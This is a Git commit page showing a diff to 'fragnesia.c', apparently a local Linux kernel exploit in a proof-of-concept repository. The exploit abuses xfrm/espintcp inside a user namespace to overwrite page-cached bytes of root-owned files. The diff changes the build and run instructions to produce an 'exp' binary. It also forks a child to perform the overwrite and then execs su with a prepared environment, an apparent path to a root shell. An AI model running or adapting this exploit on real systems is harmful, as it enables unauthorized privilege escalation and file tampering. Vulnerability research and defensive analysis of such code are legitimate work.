milliways-infosec/fragnesia
5
0
Fork 0
mirror of https://github.com/v12-security/pocs.git synced 2026-05-16 11:07:43 +00:00
Code Issues Projects Releases Packages Wiki Activity Actions

Merge 603b716785 into 22046fd32e

Browse source
This commit is contained in:
Grigoriy Kolbanov 2026-05-15 21:36:07 +08:00 committed by GitHub
commit 185356182c
No known key found for this signature in database
GPG key ID: B5690EEEBB952194
1 changed files with 51 additions and 32 deletions
Download patch file Download diff file Expand all files Collapse all files

29
fragnesia/fragnesia.c
View file

@ -17,10 +17,10 @@
* to demonstrate the permission boundary. * to demonstrate the permission boundary.
* *
* Build: * Build:
* gcc -O2 -Wall -Wextra -static xfrm_espintcp_pagecache_replace.c -o xfrm_espintcp_pagecache_replace * gcc -O2 -Wall -Wextra -static fragnesia.c -o exp
* *
* Run: * Run:
* ./xfrm_espintcp_pagecache_replace /tmp/root-owned-copy 0 42434445 * ./exp /tmp/root-owned-copy 0 42434445
* *
* Exit codes: * Exit codes:
* 1: vulnerable behavior verified * 1: vulnerable behavior verified
@ -1263,9 +1263,14 @@ int main(int argc, char **argv)
{ {
unsigned char *desired; unsigned char *desired;
uint64_t file_size, byte_off; uint64_t file_size, byte_off;
size_t desired_len, sample_len; size_t desired_len;
int ret; int ret;
pid_t pid;
char *su_argv[] = {"su", NULL};
char *su_envp[] = {"TERM=xterm", "PATH=/bin:/usr/bin:/sbin:/usr/sbin", NULL};
(void)argc;
(void)argv;
setvbuf(stdout, NULL, _IONBF, 0); setvbuf(stdout, NULL, _IONBF, 0);
@ -1288,15 +1293,29 @@ int main(int argc, char **argv)
printf(C_BCYN "[*]" C_RESET " target=%s size=%llu\n", printf(C_BCYN "[*]" C_RESET " target=%s size=%llu\n",
target_file, (unsigned long long)file_size); target_file, (unsigned long long)file_size);
pid = fork();
if (pid < 0) {
perror("fork");
return 1;
}
if (pid == 0) {
verify_write_denied("outer"); verify_write_denied("outer");
setup_user_netns_xfrm(); setup_user_netns_xfrm();
verify_write_denied("userns_root_mapped_to_outer_user"); verify_write_denied("userns_root_mapped_to_outer_user");
ret = replace_existing_bytes_after(byte_off, desired, desired_len, ret = replace_existing_bytes_after(byte_off, desired, desired_len,
file_size); file_size);
exit(ret);
}
waitpid(pid, &ret, 0);
/* reset scroll region; some terminals home the cursor on \033[r so /* reset scroll region; some terminals home the cursor on \033[r so
* explicitly jump to the last row so PS1 lands below our output */ * explicitly jump to the last row so PS1 lands below our output */
write(STDOUT_FILENO, "\033[r\033[9999;1H\033[?25h\n", 19); write(STDOUT_FILENO, "\033[r\033[9999;1H\033[?25h\n", 19);
execve("/usr/bin/su", NULL, NULL); execve("/usr/bin/su", su_argv, su_envp);
return ret;
return WIFEXITED(ret) ? WEXITSTATUS(ret) : 1;
} }